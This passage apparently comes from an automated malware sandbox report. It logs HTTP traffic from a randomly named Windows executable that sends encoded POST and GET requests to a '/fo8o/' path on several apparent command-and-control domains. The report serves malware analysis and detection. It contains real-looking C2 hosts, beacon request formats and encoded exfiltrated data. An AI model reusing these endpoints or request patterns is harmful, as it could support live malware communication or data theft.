                                                          Data Ascii: Plm0mn68=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/RQCfKKPHwXKLI2NpE+fW0U8juepnRq9UOm9HUTG/luoR5Zr2UfXAcKdHrjG638+ce+KoFyxoGrr6gTO1GHh2tkjVq0DQ0YheuU3N4namSplWwnYvMSnHT0EdKHzeMDKBBYOK54Cerx97INLvY77RMPkM8a4NqIfJ+LUbPdan5y6nmVg2T15O46SSiICnn9sPdrClkySxPg90+66sxn7el0a2jZuvi1pdjOQsqgIiWprkBJkhEh1NhI2yBuBpETR2xR15hzv5uGOjbI5xG+hSJrCevX6+5B/r1EYjdsjOp+DPmOdk1YHdGGiVXAJUXG3NCruJ8ZyOrKIsAiA4xU0Y+cipB3+x3wE+kGsMJIu/ENbmD9/o+04o6fRktuLbfFz2XQVqUIAvfsgXCozvbU/03CE5nz184HydjWeA4IOQI/822lE1QIxA0aKmkQQ2TR9aOQzMhT3+YlzykrDgvhepGf+blr3jOeu8zpmgEwAJ1WB1vQslWTI8DPVD3sN4chfoASAhlFhYiLsLN1Br8ty72AZtnL0VNyn8TsFl/AKCNeZaZywUM9Ts9o5iIhSl/MbmMHkqJ11PuiwuVW4fs4eugzAHUdm6ndTJ6yD3RcbsXLcxNZIfz7Ygb6e48Q5cSR97/vMsrAa70pBWNgRbR4ucW2crGLr86RnOwlIkSTkoazJWipixcOaaq3N3fLLbAdQwE6ff5ORrKvrguF3rPYl59ccNIrokBTtd+qpwibzZy3sZDlWdCisw+cj2uD9khSFIJPkl+C6WfLq5EZOSeNgdRxRK4quH27AS9RHsHWJWQSGXaDoB5TS6MxQe5FJU7d/SQ [TRUNCATED]
                                                          May 23, 2024 20:22:55.009526968 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:22:54 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Sorting-Hat-PodId: 311
                                                          X-Sorting-Hat-ShopId: 87850025272
                                                          Vary: Accept-Encoding
                                                          x-frame-options: DENY
                                                          x-shopid: 87850025272
                                                          x-shardid: 311
                                                          x-request-id: b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574
                                                          server-timing: processing;dur=12
                                                          content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574
                                                          x-content-type-options: nosniff
                                                          x-download-options: noopen
                                                          x-permitted-cross-domain-policies: none
                                                          x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574
                                                          x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                          Content-Encoding: gzip
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zAkIpE2UUB1d%2BxlWY3heRgo6geK3PUv9hj7N%2FelFFX
                                                          Data Raw:
                                                          Data Ascii:
                                                          May 23, 2024 20:22:55.010447979 CEST1236INData Raw: 32 42 77 59 35 69 4d 39 51 42 71 63 6a 25 32 46 68 35 65 72 48 71 6d 46 78 4f 35 48 6c 25 32 46 4c 6f 32 63 73 54 33 79 4d 56 49 76 6b 35 69 56 71 46 47 6e 48 33 58 34 72 76 4d 72 44 6a 34 4d 50 79 67 54 73 33 64 6c 53 47 31 4b 54 57 74 4a 4e 36
                                                          Data Ascii: 2BwY5iM9QBqcj%2Fh5erHqmFxO5Hl%2FLo2csT3yMVIvk5iVqFGnH3X4rvMrDj4MPygTs3dlSG1KTWtJN6RmJPQTuZAQjnhaemDbNRC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDurati
                                                          May 23, 2024 20:22:55.014246941 CEST836INData Raw: 6f 0a 5e 52 0f c2 67 1e eb bc 64 07 d4 53 f7 41 d2 53 03 cc 0d a3 9b 1e ac fe e6 ec 5d 5f 23 03 c9 05 22 85 df 88 06 a8 98 55 af 42 0e ff 3c 15 76 f5 99 84 6a 39 21 06 72 75 7b 60 f4 f8 2d 7f 58 39 21 3c 5e 49 88 f0 dc 41 30 9a 74 d0 e0 57 4e e4
                                                          Data Ascii: o^RgdSAS]_#"UB<vj9!ru{`-X9!<^IA0tWNGz_IfAp<#qkHsr%,WtHUaHB*WGIaxjxC5AVR=F%0hk23}SRiN8D:Hl6\`SK


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.84974723.227.38.74803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:57.035511017 CEST525OUTGET /fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.donnavariedades.com
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:22:57.568165064 CEST1236INHTTP/1.1 301 Moved Permanently
                                                          Date: Thu, 23 May 2024 18:22:57 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Sorting-Hat-PodId: 311
                                                          X-Sorting-Hat-ShopId: 87850025272
                                                          X-Storefront-Renderer-Rendered: 1
                                                          location: https://donnavariedades.com/fo8o?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL
                                                          x-redirect-reason: https_required
                                                          x-frame-options: DENY
                                                          content-security-policy: frame-ancestors 'none';
                                                          x-shopid: 87850025272
                                                          x-shardid: 311
                                                          vary: Accept
                                                          powered-by: Shopify
                                                          server-timing: processing;dur=23, db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="fk2t", requestID;desc="fcbf0c9f-24d2-4c08-8aca-9a46dabc82d9-1716488577"
                                                          x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                          x-request-id: fcbf0c9f-24d2-4c08-8aca-9a46dabc82d9-1716488577
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aX9BcaRVKYeFmuh3rQV1XnOU5oIjVeNKf8MsrZ5vbSyXsCH%2B2hyTz8XajjHfF%2BWfJ96QcIVDBIviYqaVyYlj1WxUM%2FT6dYgWlD8RyI7FS3F15sLBPiQZKL82q0omIIOHftsy1boqNt5K"}],"group":"cf-nel","max_age":604800
                                                          Data Raw:
                                                          Data Ascii:
                                                          May 23, 2024 20:22:57.572949886 CEST342INData Raw: 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d
                                                          Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=76.999903X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Optio


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.84974834.111.148.214803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:04.067490101 CEST774OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.660danm.top
                                                          Origin: http://www.660danm.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.660danm.top/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 56 31 36 44 4b 50 79 32 49 43 4d 2f 6f 68 46 34 2b 6a 45 73 31 46 6d 7a 5a 44 42 57 50 33 7a 2b 34 55 78 6b 33 58 41 3d
                                                          Data Ascii: Plm0mn68=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNV16DKPy2ICM/ohF4+jEs1FmzZDBWP3z+4Uxk3XA=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.84974934.111.148.214803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:06.622719049 CEST794OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.660danm.top
                                                          Origin: http://www.660danm.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.660danm.top/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 4f 59 5a 41 70 67 4b 41 75 57 69 33 68 55 70 41 57 32 74 33 72 36 54 77 38 36 49 67 69 37 31 76 36 7a 64 6f 71 68
                                                          Data Ascii: Plm0mn68=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FOYZApgKAuWi3hUpAW2t3r6Tw86Igi71v6zdoqh


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.84975034.111.148.214803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:09.156965971 CEST1811OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.660danm.top
                                                          Origin: http://www.660danm.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.660danm.top/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 4d 39 68 52 46 51 68 41 4d 57 6c 6b 57 32 5a 58 6f 4c 4d 53 6d 45 67 57 78 69 69 6a 32 77 37 7a 6a 37 5a 69 39 78 4d 41 4c 49 70 4c 4f 47 56 63 44 63 57 73 6a 55 47 63 58 65 7a 52 68 39 4e 42 4c 31 4c 31 58 78 39 49 4b 55 6c 62 34 44 77 33 36 37 49 69 6a 4a 4b 69 58 76 7a 73 7a 68 5a 4e 74 54 53 6e 6f 71 39 7a 49 56 52 78 46 2b 6d 48 30 71 4f 61 63 78 37 4b 71 44 36 58 4d 41 72 49 30 30 52 6b 2b 58 57 34 33 57 7a 4b 46 53 47 4a 63 67 33 34 55 67 36 58 43 74 74 76 4f 70 59 [TRUNCATED]
                                                          Data Ascii: Plm0mn68=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICM9hRFQhAMWlkW2ZXoLMSmEgWxiij2w7zj7Zi9xMALIpLOGVcDcWsjUGcXezRh9NBL1L1Xx9IKUlb4Dw367IijJKiXvzszhZNtTSnoq9zIVRxF+mH0qOacx7KqD6XMArI00Rk+XW43WzKFSGJcg34Ug6XCttvOpYHDs2LgqPSxA4udmxAnzbTYJZfcIAsFH5RRH1G91uuA7xVssKePfPt5D/p8or1ojF02/cgD4sFpbSKJABYVS72CuPcm1FGrxk8DMXiaNO/uo1ZFJTob7G/vqyzzezR78iUGbKriLN/lhtw2Oqzl7bEnDItDYo66+NhbX2y0Uc0NtzoFM5n93vYQmCkeVmWkLRWLJIgKX6cK7TOuHp2tEuxWkXXWvfS6UOx/+jdd/sbzdJJ/Xs/wfBfJzyvv1iqlIRffJwRoEPgOlsokAWvrgL7mf+OUVV+CEz54ZOtTRVOEzWFiYm4xv1msoih8Z1OeDBTAIZp9oBuGXH414f6v5Jr9k6yg+9Fn2oWtLLoQm4x3dsC+5aeMWboDsKGcrAFuHbshg6Me1GMvyfRXwkPjA04W/q1NZfwG+f4rijvqhH3oSR/TaeH2G0uLO9BHixaW51K20n2icYewDi3BCtDqZyULq6R75uMY2YCBlSVFpBkR0Rb6Ha2UxY4Tjx1hh7/AXekNGR4vTEGVYIQpe6HUxQAcH16qjlcGvZ3FUS7ISx85sdjETt6UIrDbfjEur68BFZnOdNr0HEf2zABeawoEApvYt1zEvDU7PrhFBz0EuWg0g49q4sDOC6FONTQknAAATCGW+rh7WJaM8Hp7ozGJZ4KfrxRQIXjpNrQd [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.84975134.111.148.214803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:11.722414017 CEST517OUTGET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.660danm.top
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:23:21.370659113 CEST507INHTTP/1.1 502 Bad Gateway
                                                          Content-Type: text/html; charset=UTF-8
                                                          Referrer-Policy: no-referrer
                                                          Content-Length: 332
                                                          Date: Thu, 23 May 2024 18:23:21 GMT
                                                          Connection: close
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 20 74 65 6d 70 6f 72 61 72 79 20 65 72 72 6f 72 20 61 6e 64 20 63 6f 75 6c 64 20 6e 6f 74 20 63 6f 6d 70 6c 65 74 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 69 6e 20 33 30 20 73 65 63 6f 6e 64 73 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>502 Server Error</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Server Error</h1><h2>The server encountered a temporary error and could not complete your request.<p>Please try again in 30 seconds.</h2><h2></h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.849752217.196.55.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:26.608728886 CEST792OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.empowermedeco.com
                                                          Origin: http://www.empowermedeco.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 74 34 45 67 75 6d 30 31 36 50 44 43 47 38 4e 50 79 48 57 47 68 68 34 36 44 79 31 5a 4b 71 52 6a 37 71 63 30 57 30 3d
                                                          Data Ascii: Plm0mn68=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jut4Egum016PDCG8NPyHWGhh46Dy1ZKqRj7qc0W0=
                                                          May 23, 2024 20:23:27.184909105 CEST1070INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 795
                                                          date: Thu, 23 May 2024 18:23:27 GMT
                                                          server: LiteSpeed
                                                          location: https://www.empowermedeco.com/fo8o/
                                                          platform: hostinger
                                                          content-security-policy: upgrade-insecure-requests
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.849753217.196.55.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:29.166888952 CEST812OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.empowermedeco.com
                                                          Origin: http://www.empowermedeco.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 54 36 41 61 44 63 39 33 35 35 59 36 73 71 42 6a 43 79 51 72 49 41 63 6b 58 5a 30 54 72 6a 6c 56 48 6b 36 30 65
                                                          Data Ascii: Plm0mn68=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJT6AaDc9355Y6sqBjCyQrIAckXZ0TrjlVHk60e
                                                          May 23, 2024 20:23:29.851511955 CEST1070INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 795
                                                          date: Thu, 23 May 2024 18:23:29 GMT
                                                          server: LiteSpeed
                                                          location: https://www.empowermedeco.com/fo8o/
                                                          platform: hostinger
                                                          content-security-policy: upgrade-insecure-requests
